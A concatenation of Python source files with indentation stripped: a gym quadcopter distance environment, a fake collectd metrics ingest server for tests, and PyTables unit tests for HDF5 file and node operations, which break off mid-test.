Thread(target=lambda : urllib.request.urlretrieve(url,fname)).start()
|
distance.py
|
#!/usr/bin/env python3
'''
3D distance-maximizing environment
Copyright (C) 2020 Simon D. Levy
MIT License
'''
import numpy as np
import gym
from gym import spaces
from gym.utils import seeding, EzPickle
from gym_copter.dynamics.djiphantom import DJIPhantomDynamics
class Distance(gym.Env, EzPickle):
FRAMES_PER_SECOND = 50
metadata = {
'render.modes': ['human', 'rgb_array'],
'video.frames_per_second' : FRAMES_PER_SECOND
}
def __init__(self):
EzPickle.__init__(self)
self.seed()
# Observation is all state values except yaw and its derivative
self.observation_space = spaces.Box(-np.inf, np.inf, shape=(10,), dtype=np.float32)
# Action is motor values
self.action_space = spaces.Box(-1, +1, (4,), dtype=np.float32)
# Support for rendering
self.renderer = None
self.pose = None
self.reset()
def seed(self, seed=None):
self.np_random, seed = seeding.np_random(seed)
return [seed]
def reset(self):
self.prev_shaping = None
# Create cusom dynamics model
self.dynamics = DJIPhantomDynamics(self.FRAMES_PER_SECOND)
# Initialize custom dynamics
state = np.zeros(12)
self.dynamics.setState(state)
return self.step(np.array([0, 0, 0, 0]))[0]
def step(self, action):
# Abbreviation
d = self.dynamics
d.setMotors(action)
d.update()
# Get new state from dynamics
posx, velx, posy, vely, posz, velz, phi, velphi, theta, veltheta, psi, _ = d.getState()
# Set pose in display
self.pose = posx, posy, posz, phi, theta, psi
# Convert state to usable form
state = np.array([posx, velx, posy, vely, posz, velz, phi, velphi, theta, veltheta])
# Reward is a simple penalty for overall distance and velocity
shaping = np.sqrt(posx**2 + posy**2)
reward = (shaping - self.prev_shaping) if (self.prev_shaping is not None) else 0
self.prev_shaping = shaping
done = False
return np.array(state, dtype=np.float32), reward, done, {}
def render(self, mode='human'):
from gym_copter.rendering.threed import ThreeDDistanceRenderer
# Create renderer if not done yet
if self.renderer is None:
self.renderer = ThreeDDistanceRenderer(self, self.LANDING_RADIUS)
return self.renderer.render()
def close(self):
return
## End of Distance class ----------------------------------------------------------------
def heuristic(env, s):
"""
The heuristic for
1. Testing
2. Demonstration rollout.
Args:
env: The environment
s (list): The state. Attributes:
s[0] is the X coordinate
s[1] is the X speed
s[2] is the Y coordinate
s[3] is the Y speed
s[4] is the vertical coordinate
s[5] is the vertical speed
s[6] is the roll angle
s[7] is the roll angular speed
s[8] is the pitch angle
s[9] is the pitch angular speed
returns:
a: The heuristic to be fed into the step function defined above to determine the next step and reward.
"""
_, _, _, _, posz, _, _, _, theta, _ = s
action = np.zeros(4)
if posz > -3:
action = 0.6 * np.ones(4) # below 2m, takeoff
elif theta < np.pi/8:
action = np.array([.505, .5, .505, .5]) # shallow pitch; pitch forward
else:
action = 0.55*np.ones(4)
return action
def heuristic_distance(env, renderer=None, seed=None):
import time
if seed is not None:
env.seed(seed)
np.random.seed(seed)
total_reward = 0
steps = 0
state = env.reset()
while True:
action = heuristic(env,state)
state, reward, done, _ = env.step(action)
total_reward += reward
if steps % 20 == 0 or done:
print("observations:", " ".join(["{:+0.2f}".format(x) for x in state]))
print("step {} total_reward {:+0.2f}".format(steps, total_reward))
steps += 1
if done: break
if not renderer is None:
time.sleep(1./env.FRAMES_PER_SECOND)
env.close()
return total_reward
if __name__ == '__main__':
from gym_copter.rendering.threed import ThreeDDistanceRenderer
import threading
env = Distance()
renderer = ThreeDDistanceRenderer(env)
thread = threading.Thread(target=heuristic_distance, args=(env, renderer))
thread.daemon = True
thread.start()
# Begin 3D rendering on main thread
renderer.start()
|
sink.py
|
import json
import signal
import threading
from http.server import BaseHTTPRequestHandler, HTTPServer
from time import time
# This module collects metrics from collectd and can echo them back out for
# making assertions on the collected metrics.
# Fake the /v1/collectd endpoint and just stick all of the metrics in a
# list
def run_fake_ingest(metric_data):
class FakeCollectdIngest(BaseHTTPRequestHandler):
def do_POST(self):
body = self.rfile.read(int(self.headers.get("Content-Length")))
metric_data.extend(json.loads(body))
self.send_response(200)
self.send_header("Content-Type", "text/ascii")
self.send_header("Content-Length", "2")
self.end_headers()
self.wfile.write("OK".encode("utf-8"))
print("Starting ingest server on port 80")
httpd = HTTPServer(("", 80), FakeCollectdIngest)
httpd.serve_forever()
print("Ingest server shutting down")
# Dumps all of the collected metrics back out as JSON upon request
def serve_metric_data(metric_data):
class MetricDataSpewer(BaseHTTPRequestHandler):
def do_GET(self):
data = json.dumps(metric_data)
self.send_response(200)
self.send_header("Content-Type", "application/json")
self.send_header("Content-Length", str(len(data)))
self.end_headers()
print(data)
self.wfile.write(data.encode("utf-8"))
print("Starting metric spewer on port 8080")
httpd = HTTPServer(("", 8080), MetricDataSpewer)
httpd.serve_forever()
print("Metric spewer shutting down")
if __name__ == "__main__":
# Lists are thread-safe due to the GIL
metric_data = []
t1 = threading.Thread(target=run_fake_ingest, args=(metric_data,))
t2 = threading.Thread(target=serve_metric_data, args=(metric_data,))
t1.start()
t2.start()
t1.join()
t2.join()
|
test_basics.py
|
# -*- coding: utf-8 -*-
import os
import sys
import shutil
import platform
import tempfile
import warnings
import threading
import subprocess
import queue
try:
import multiprocessing as mp
multiprocessing_imported = True
except ImportError:
multiprocessing_imported = False
import numpy
import tables
import tables.flavor
from tables import (
Description, IsDescription, Float64Atom, Col, IntCol, Int16Col, Int32Col,
FloatCol, Float64Col,
ClosedFileError, FileModeError, FlavorError, FlavorWarning,
NaturalNameWarning, ClosedNodeError, NodeError, NoSuchNodeError,
UnImplemented,
)
from tables.flavor import all_flavors, array_of_flavor
from tables.parameters import NODE_CACHE_SLOTS
from tables.description import descr_from_dtype, dtype_from_descr
from tables.tests import common
from tables.tests.common import unittest, test_filename
from tables.tests.common import PyTablesTestCase as TestCase
class OpenFileFailureTestCase(TestCase):
def setUp(self):
super(OpenFileFailureTestCase, self).setUp()
import tables.file
self.N = len(tables.file._open_files)
self.open_files = tables.file._open_files
def test01_open_file(self):
"""Checking opening of a non existing file."""
h5fname = tempfile.mktemp(".h5")
with self.assertRaises(IOError):
h5file = tables.open_file(h5fname)
h5file.close()
self.assertEqual(self.N, len(self.open_files))
def test02_open_file(self):
"""Checking opening of an existing non HDF5 file."""
# create a dummy file
h5fname = tempfile.mktemp(".h5")
open(h5fname, 'wb').close()
# Try to open the dummy file
try:
with self.assertRaises(tables.HDF5ExtError):
h5file = tables.open_file(h5fname)
h5file.close()
self.assertEqual(self.N, len(self.open_files))
finally:
os.remove(h5fname)
def test03_open_file(self):
"""Checking opening of an existing file with invalid mode."""
# See gh-318
# create a dummy file
h5fname = tempfile.mktemp(".h5")
h5file = tables.open_file(h5fname, "w")
h5file.close()
try:
# Try to open the dummy file
self.assertRaises(ValueError, tables.open_file, h5fname, "ab")
finally:
os.remove(h5fname)
class OpenFileTestCase(common.TempFileMixin, TestCase):
def setUp(self):
super(OpenFileTestCase, self).setUp()
self.populateFile()
def populateFile(self):
root = self.h5file.root
# Create an array
self.h5file.create_array(root, 'array', [1, 2], title="Array example")
self.h5file.create_table(root, 'table', {'var1': IntCol()},
"Table example")
root._v_attrs.testattr = 41
# Create another array object
self.h5file.create_array(root, 'anarray', [1], "Array title")
self.h5file.create_table(root, 'atable', {'var1': IntCol()},
"Table title")
# Create a group object
group = self.h5file.create_group(root, 'agroup', "Group title")
group._v_attrs.testattr = 42
# Create a some objects there
array1 = self.h5file.create_array(group, 'anarray1',
[1, 2, 3, 4, 5, 6, 7],
"Array title 1")
array1.attrs.testattr = 42
self.h5file.create_array(group, 'anarray2', [2], "Array title 2")
self.h5file.create_table(group, 'atable1', {
'var1': IntCol()}, "Table title 1")
ra = numpy.rec.array([(1, 11, 'a')], formats='u1,f4,a1')
self.h5file.create_table(group, 'atable2', ra, "Table title 2")
# Create a lonely group in first level
self.h5file.create_group(root, 'agroup2', "Group title 2")
# Create a new group in the second level
group3 = self.h5file.create_group(group, 'agroup3', "Group title 3")
# Create a new group in the third level
self.h5file.create_group(group3, 'agroup4', "Group title 4")
# Create an array in the root with the same name as one in 'agroup'
self.h5file.create_array(root, 'anarray1', [1, 2],
title="Array example")
def test00_newFile(self):
"""Checking creation of a new file."""
self.h5file.create_array(self.h5file.root, 'array_new', [1, 2],
title="Array example")
# Get the CLASS attribute of the arr object
class_ = self.h5file.root.array.attrs.CLASS
self.assertEqual(class_.capitalize(), "Array")
def test00_newFile_unicode_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = str(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
self.assertTrue(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test00_newFile_numpy_str_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = numpy.str_(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
self.assertTrue(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test00_newFile_numpy_unicode_filename(self):
temp_dir = tempfile.mkdtemp()
try:
h5fname = numpy.unicode_(os.path.join(temp_dir, 'test.h5'))
with tables.open_file(h5fname, 'w') as h5file:
self.assertTrue(h5file, tables.File)
finally:
shutil.rmtree(temp_dir)
def test01_openFile(self):
"""Checking opening of an existing file."""
# Open the old HDF5 file
self._reopen(node_cache_slots=self.node_cache_slots)
# Get the CLASS attribute of the arr object
title = self.h5file.root.array.get_attr("TITLE")
self.assertEqual(title, "Array example")
def test02_appendFile(self):
"""Checking appending objects to an existing file."""
# Append a new array to the existing file
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Get the CLASS attribute of the arr object
title = self.h5file.root.array2.get_attr("TITLE")
self.assertEqual(title, "Title example 2")
def test02b_appendFile2(self):
"""Checking appending objects to an existing file ("a" version)"""
# Append a new array to the existing file
self._reopen(mode="a", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Get the CLASS attribute of the arr object
title = self.h5file.root.array2.get_attr("TITLE")
self.assertEqual(title, "Title example 2")
# Begin to raise errors...
def test03_appendErrorFile(self):
"""Checking appending objects to an existing file in "w" mode."""
# Append a new array to the existing file but in write mode
# so, the existing file should be deleted!
self._reopen(mode="w", node_cache_slots=self.node_cache_slots)
self.h5file.create_array(self.h5file.root, 'array2', [3, 4],
title="Title example 2")
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
with self.assertRaises(LookupError):
# Try to get the 'array' object in the old existing file
self.h5file.root.array
def test04a_openErrorFile(self):
"""Checking opening a non-existing file for reading"""
with self.assertRaises(IOError):
tables.open_file("nonexistent.h5", mode="r",
node_cache_slots=self.node_cache_slots)
def test04b_alternateRootFile(self):
"""Checking alternate root access to the object tree."""
# Open the existent HDF5 file
self._reopen(root_uep="/agroup",
node_cache_slots=self.node_cache_slots)
# Get the CLASS attribute of the arr object
if common.verbose:
print("\nFile tree dump:", self.h5file)
title = self.h5file.root.anarray1.get_attr("TITLE")
# Get the node again, as this can trigger errors in some situations
anarray1 = self.h5file.root.anarray1
self.assertIsNotNone(anarray1)
self.assertEqual(title, "Array title 1")
# This test works well, but HDF5 emits a series of messages that
# may loose the user. It is better to deactivate it.
def notest04c_alternateRootFile(self):
"""Checking non-existent alternate root access to the object tree"""
with self.assertRaises(RuntimeError):
self._reopen(root_uep="/nonexistent",
node_cache_slots=self.node_cache_slots)
def test05a_removeGroupRecursively(self):
"""Checking removing a group recursively."""
# Delete a group with leafs
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
self.h5file.remove_node(self.h5file.root.agroup)
# This should work now
self.h5file.remove_node(self.h5file.root, 'agroup', recursive=1)
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child of the removed object
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test05b_removeGroupRecursively(self):
"""Checking removing a group recursively and access to it
immediately."""
if common.verbose:
print('\n', '-=' * 30)
print("Running %s.test05b_removeGroupRecursively..." %
self.__class__.__name__)
# Delete a group with leafs
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
self.h5file.remove_node(self.h5file.root, 'agroup')
# This should work now
self.h5file.remove_node(self.h5file.root, 'agroup', recursive=1)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child of the removed object
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test06_removeNodeWithDel(self):
"""Checking removing a node using ``__delattr__()``"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(AttributeError):
# This should fail because there is no *Python attribute*
# called ``agroup``.
del self.h5file.root.agroup
def test06a_removeGroup(self):
"""Checking removing a lonely group from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'agroup2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.agroup2
def test06b_removeLeaf(self):
"""Checking removing Leaves from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'anarray')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test06c_removeLeaf(self):
"""Checking removing Leaves and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'anarray')
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test06d_removeLeaf(self):
"""Checking removing a non-existent node"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.remove_node(self.h5file.root, 'nonexistent')
def test06e_removeTable(self):
"""Checking removing Tables from an existing file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.remove_node(self.h5file.root, 'atable')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Try to get the removed object
with self.assertRaises(LookupError):
self.h5file.root.atable
def test07_renameLeaf(self):
"""Checking renaming a leave and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
array_ = self.h5file.root.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/anarray2")
self.assertEqual(array_._v_depth, 1)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test07b_renameLeaf(self):
"""Checking renaming Leaves and accesing them immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
# Ensure that the new name exists
array_ = self.h5file.root.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/anarray2")
self.assertEqual(array_._v_depth, 1)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test07c_renameLeaf(self):
"""Checking renaming Leaves and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.anarray, 'anarray2')
array_ = self.h5file.root.anarray2
array_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(array_.title, "hello")
self.assertEqual(array_.attrs.TITLE, "hello")
def test07d_renameLeaf(self):
"""Checking renaming a Group under a nested group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup.anarray2, 'anarray3')
# Ensure that we can access n attributes in the new group
node = self.h5file.root.agroup.anarray3
self.assertEqual(node._v_title, "Array title 2")
def test08_renameToExistingLeaf(self):
"""Checking renaming a node to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.rename_node(self.h5file.root.anarray, 'array')
# Now overwrite the destination node.
anarray = self.h5file.root.anarray
self.h5file.rename_node(anarray, 'array', overwrite=True)
self.assertNotIn('/anarray', self.h5file)
self.assertIs(self.h5file.root.array, anarray)
def test08b_renameToNotValidNaturalName(self):
"""Checking renaming a node to a non-valid natural name"""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with warnings.catch_warnings():
warnings.filterwarnings("error", category=NaturalNameWarning)
# Try to get the previous object with the old name
with self.assertRaises(NaturalNameWarning):
self.h5file.rename_node(self.h5file.root.anarray, 'array 2')
def test09_renameGroup(self):
"""Checking renaming a Group and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
group = self.h5file.root.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/agroup3")
# The children of this group also must be accessible through the
# new name path
group2 = self.h5file.get_node("/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/agroup3/agroup3")
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test09b_renameGroup(self):
"""Checking renaming a Group and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Ensure that the new name exists
group = self.h5file.root.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/agroup3")
# The children of this group also must be accessible through the
# new name path
group2 = self.h5file.get_node("/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/agroup3/agroup3")
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test09c_renameGroup(self):
"""Checking renaming a Group and modify attributes afterwards."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup, 'agroup3')
# Ensure that we can modify attributes in the new group
group = self.h5file.root.agroup3
group._v_attrs.TITLE = "Hello"
self.assertEqual(group._v_title, "Hello")
self.assertEqual(group._v_attrs.TITLE, "Hello")
def test09d_renameGroup(self):
"""Checking renaming a Group under a nested group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
self.h5file.rename_node(self.h5file.root.agroup.agroup3, 'agroup4')
# Ensure that we can access n attributes in the new group
group = self.h5file.root.agroup.agroup4
self.assertEqual(group._v_title, "Group title 3")
def test09e_renameGroup(self):
"""Checking renaming a Group with nested groups in the LRU cache."""
# This checks for ticket #126.
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Load intermediate groups and keep a nested one alive.
g = self.h5file.root.agroup.agroup3.agroup4
self.assertIsNotNone(g)
self.h5file.rename_node('/', name='agroup', newname='agroup_')
# see ticket #126
self.assertNotIn('/agroup_/agroup4', self.h5file)
self.assertNotIn('/agroup', self.h5file)
for newpath in ['/agroup_', '/agroup_/agroup3',
'/agroup_/agroup3/agroup4']:
self.assertIn(newpath, self.h5file)
self.assertEqual(
newpath, self.h5file.get_node(newpath)._v_pathname)
def test10_moveLeaf(self):
"""Checking moving a leave and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
array_ = self.h5file.root.newgroup.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/newgroup/anarray2")
self.assertEqual(array_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test10b_moveLeaf(self):
"""Checking moving a leave and access it without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
# Ensure that the new name exists
array_ = self.h5file.root.newgroup.anarray2
self.assertEqual(array_.name, "anarray2")
self.assertEqual(array_._v_pathname, "/newgroup/anarray2")
self.assertEqual(array_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.anarray
def test10c_moveLeaf(self):
"""Checking moving Leaves and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.anarray, newgroup, 'anarray2')
array_ = self.h5file.root.newgroup.anarray2
array_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(array_.title, "hello")
self.assertEqual(array_.attrs.TITLE, "hello")
def test10d_moveToExistingLeaf(self):
"""Checking moving a leaf to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(
self.h5file.root.anarray, self.h5file.root, 'array')
def test10_2_moveTable(self):
"""Checking moving a table and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.atable
def test10_2b_moveTable(self):
"""Checking moving a table and access it without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.atable
def test10_2b_bis_moveTable(self):
"""Checking moving a table and use cached row without a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
# Cache the Row attribute prior to the move
row = self.h5file.root.atable.row
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
# Ensure that the new name exists
table_ = self.h5file.root.newgroup.atable2
self.assertEqual(table_.name, "atable2")
self.assertEqual(table_._v_pathname, "/newgroup/atable2")
self.assertEqual(table_._v_depth, 2)
# Ensure that cache Row attribute has been updated
row = table_.row
self.assertEqual(table_._v_pathname, row.table._v_pathname)
nrows = table_.nrows
# Add a new row just to make sure that this works
row.append()
table_.flush()
self.assertEqual(table_.nrows, nrows + 1)
def test10_2c_moveTable(self):
"""Checking moving tables and modify attributes after that."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group("/", "newgroup")
self.h5file.move_node(self.h5file.root.atable, newgroup, 'atable2')
table_ = self.h5file.root.newgroup.atable2
table_.attrs.TITLE = "hello"
# Ensure that the new attribute has been written correctly
self.assertEqual(table_.title, "hello")
self.assertEqual(table_.attrs.TITLE, "hello")
def test10_2d_moveToExistingTable(self):
"""Checking moving a table to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(self.h5file.root.atable, self.h5file.root,
'table')
def test10_2e_moveToExistingTableOverwrite(self):
"""Checking moving a table to an existing name, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
srcNode = self.h5file.root.atable
self.h5file.move_node(srcNode, self.h5file.root, 'table',
overwrite=True)
dstNode = self.h5file.root.table
self.assertIs(srcNode, dstNode)
def test11_moveGroup(self):
"""Checking moving a Group and access it after a close/open."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Open this file in read-only mode
self._reopen(node_cache_slots=self.node_cache_slots)
# Ensure that the new name exists
group = self.h5file.root.newgroup.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/newgroup/agroup3")
self.assertEqual(group._v_depth, 2)
# The children of this group must also be accessible through the
# new name path
group2 = self.h5file.get_node("/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_depth, 3)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test11b_moveGroup(self):
"""Checking moving a Group and access it immediately."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Ensure that the new name exists
group = self.h5file.root.newgroup.agroup3
self.assertEqual(group._v_name, "agroup3")
self.assertEqual(group._v_pathname, "/newgroup/agroup3")
self.assertEqual(group._v_depth, 2)
# The children of this group must also be accessible through the
# new name path
group2 = self.h5file.get_node("/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_name, "agroup3")
self.assertEqual(group2._v_pathname, "/newgroup/agroup3/agroup3")
self.assertEqual(group2._v_depth, 3)
# Try to get the previous object with the old name
with self.assertRaises(LookupError):
self.h5file.root.agroup
# Try to get a child with the old pathname
with self.assertRaises(LookupError):
self.h5file.get_node("/agroup/agroup3")
def test11c_moveGroup(self):
"""Checking moving a Group and modify attributes afterwards."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
newgroup = self.h5file.create_group(self.h5file.root, 'newgroup')
self.h5file.move_node(self.h5file.root.agroup, newgroup, 'agroup3')
# Ensure that we can modify attributes in the new group
group = self.h5file.root.newgroup.agroup3
group._v_attrs.TITLE = "Hello"
group._v_attrs.hola = "Hello"
self.assertEqual(group._v_title, "Hello")
self.assertEqual(group._v_attrs.TITLE, "Hello")
self.assertEqual(group._v_attrs.hola, "Hello")
def test11d_moveToExistingGroup(self):
"""Checking moving a group to an existing name."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# Try to get the previous object with the old name
with self.assertRaises(NodeError):
self.h5file.move_node(self.h5file.root.agroup, self.h5file.root,
'agroup2')
def test11e_moveToExistingGroupOverwrite(self):
"""Checking moving a group to an existing name, overwriting it."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 -> agroup
srcNode = self.h5file.root.agroup2
self.h5file.move_node(srcNode, self.h5file.root, 'agroup',
overwrite=True)
dstNode = self.h5file.root.agroup
self.assertIs(srcNode, dstNode)
def test12a_moveNodeOverItself(self):
"""Checking moving a node over itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# array -> array
srcNode = self.h5file.root.array
self.h5file.move_node(srcNode, self.h5file.root, 'array')
dstNode = self.h5file.root.array
self.assertIs(srcNode, dstNode)
def test12b_moveGroupIntoItself(self):
"""Checking moving a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
with self.assertRaises(NodeError):
# agroup2 -> agroup2/
self.h5file.move_node(self.h5file.root.agroup2,
self.h5file.root.agroup2)
def test13a_copyLeaf(self):
"""Copying a leaf."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# array => agroup2/
new_node = self.h5file.copy_node(self.h5file.root.array,
self.h5file.root.agroup2)
dstNode = self.h5file.root.agroup2.array
self.assertIs(new_node, dstNode)
def test13b_copyGroup(self):
"""Copying a group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup/
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
self.h5file.root.agroup)
dstNode = self.h5file.root.agroup.agroup2
self.assertIs(new_node, dstNode)
def test13c_copyGroupSelf(self):
"""Copying a group into itself."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup2 => agroup2/
new_node = self.h5file.copy_node(self.h5file.root.agroup2,
self.h5file.root.agroup2)
dstNode = self.h5file.root.agroup2.agroup2
self.assertIs(new_node, dstNode)
def test13d_copyGroupRecursive(self):
"""Recursively copying a group."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
# agroup => agroup2/
new_node = self.h5file.copy_node(
self.h5file.root.agroup, self.h5file.root.agroup2, recursive=True)
dstNode = self.h5file.root.agroup2.agroup
self.assertIs(new_node, dstNode)
dstChild1 = dstNode.anarray1
self.assertIsNotNone(dstChild1)
dstChild2 = dstNode.anarray2
self.assertIsNotNone(dstChild2)
dstChild3 = dstNode.agroup3
self.assertIsNotNone(dstChild3)
def test13e_copyRootRecursive(self):
"""Recursively copying the root group into the root of another file."""
self._reopen(mode="r+", node_cache_slots=self.node_cache_slots)
h5fname2 = tempfile.mktemp(".h5")
h5file2 = tables.open_file(
h5fname2, mode="w", node_cache_slots=self.node_cache_slots)
try:
# h5file.root => h5file2.root
new_node = self.h5file.copy_node(
